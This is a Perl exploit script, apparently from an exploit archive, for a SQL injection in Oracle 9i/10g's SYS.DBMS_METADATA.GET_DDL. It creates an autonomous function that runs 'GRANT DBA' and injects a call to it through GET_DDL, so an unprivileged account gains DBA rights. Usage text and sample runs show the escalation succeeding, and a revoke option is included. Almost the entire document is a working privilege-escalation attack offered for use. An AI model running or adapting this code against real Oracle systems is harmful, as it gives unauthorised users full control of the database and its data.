Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit

                                                #!/usr/bin/perl
#
# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on \"Oracle Database 10g Enterprise Edition Release 10.1.0.3.0\"
# 
#   REF:    http://www.securityfocus.com/bid/16287 
#
#   AUTHOR: Andrea \"bunker\" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Fri Feb 23 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement \"REVOKE DBA FROM BUNKER\"] at dbms_meta_get_ddl.pl line 95.
#  [-] Done!
#
# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil function...
#  [-] Go ...(don\'t worry about errors)!
#  DBD::Oracle::st execute failed: ORA-31600: invalid input value \'||BUNKER.own||\' for parameter OBJECT_TYPE in function GET_DDL
#  ORA-06512: at \"SYS.DBMS_METADATA\", line 2576
#  ORA-06512: at \"SYS.DBMS_METADATA\", line 2627
#  ORA-06512: at \"SYS.DBMS_METADATA\", line 4220
#  ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement \"
#  DECLARE
#   R CLOB;
#  BEGIN
#   R := SYS.DBMS_METADATA.GET_DDL(\'\'\'||BUNKER.own||\'\'\',\'\');
#  END;
#  \"] at dbms_meta_get_ddl.pl line 120.
#  [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  [-] Done!
#  

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;<<\"USAGE\";
&nbsp;&nbsp;&nbsp;&nbsp;
Syntax:&nbsp;$0&nbsp;-h&nbsp;<host>&nbsp;-s&nbsp;<sid>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<passwd>&nbsp;-g|-r&nbsp;[-P&nbsp;<port>]

Options:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;address
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<sid>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;sid&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<passwd>&nbsp;&nbsp;&nbsp;password&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-g|-r&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(g)rant&nbsp;dba&nbsp;to&nbsp;user&nbsp;|&nbsp;(r)evoke&nbsp;dba&nbsp;from&nbsp;user
&nbsp;&nbsp;&nbsp;&nbsp;[-P&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Oracle&nbsp;port]

USAGE
&nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;0
}

my&nbsp;$opt_string&nbsp;=&nbsp;\'h:s:u:p:grP:\';
getopts($opt_string,&nbsp;\\%opt)&nbsp;or&nbsp;&usage;
&usage&nbsp;if&nbsp;(&nbsp;!$opt{h}&nbsp;or&nbsp;!$opt{s}&nbsp;or&nbsp;!$opt{u}&nbsp;or&nbsp;!$opt{p}&nbsp;);
&usage&nbsp;if&nbsp;(&nbsp;!$opt{g}&nbsp;and&nbsp;!$opt{r}&nbsp;);
my&nbsp;$user&nbsp;=&nbsp;uc&nbsp;$opt{u};

my&nbsp;$dbh&nbsp;=&nbsp;undef;
if&nbsp;($opt{P})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die;
}

my&nbsp;$sqlcmd&nbsp;=&nbsp;\"GRANT&nbsp;DBA&nbsp;TO&nbsp;$user\";
print&nbsp;\"[-]&nbsp;Wait...
\";

if&nbsp;($opt{r})&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;$user...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$sqlcmd&nbsp;=&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;$user\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->do(&nbsp;$sqlcmd&nbsp;);
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Done!
\";
&nbsp;&nbsp;&nbsp;&nbsp;$dbh->disconnect;
&nbsp;&nbsp;&nbsp;&nbsp;exit;
}

print&nbsp;\"[-]&nbsp;Creating&nbsp;evil&nbsp;function...
\";
$dbh->do(&nbsp;qq{
CREATE&nbsp;OR&nbsp;REPLACE&nbsp;FUNCTION&nbsp;OWN&nbsp;RETURN&nbsp;NUMBER&nbsp;
&nbsp;AUTHID&nbsp;CURRENT_USER&nbsp;AS&nbsp;
&nbsp;PRAGMA&nbsp;AUTONOMOUS_TRANSACTION;&nbsp;
BEGIN
&nbsp;EXECUTE&nbsp;IMMEDIATE&nbsp;\'$sqlcmd\';&nbsp;COMMIT;&nbsp;
&nbsp;RETURN(0);
END;
}&nbsp;);
&nbsp;
print&nbsp;\"[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)!
\";
my&nbsp;$sth&nbsp;=&nbsp;$dbh->prepare(qq{
DECLARE
&nbsp;R&nbsp;CLOB;
BEGIN
&nbsp;R&nbsp;:=&nbsp;SYS.DBMS_METADATA.GET_DDL(\'\'\'||$user.own||\'\'\',\'\');
END;
});
$sth->execute;
$sth->finish;
print&nbsp;\"[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!!
\";
$dbh->disconnect;
exit;

&nbsp;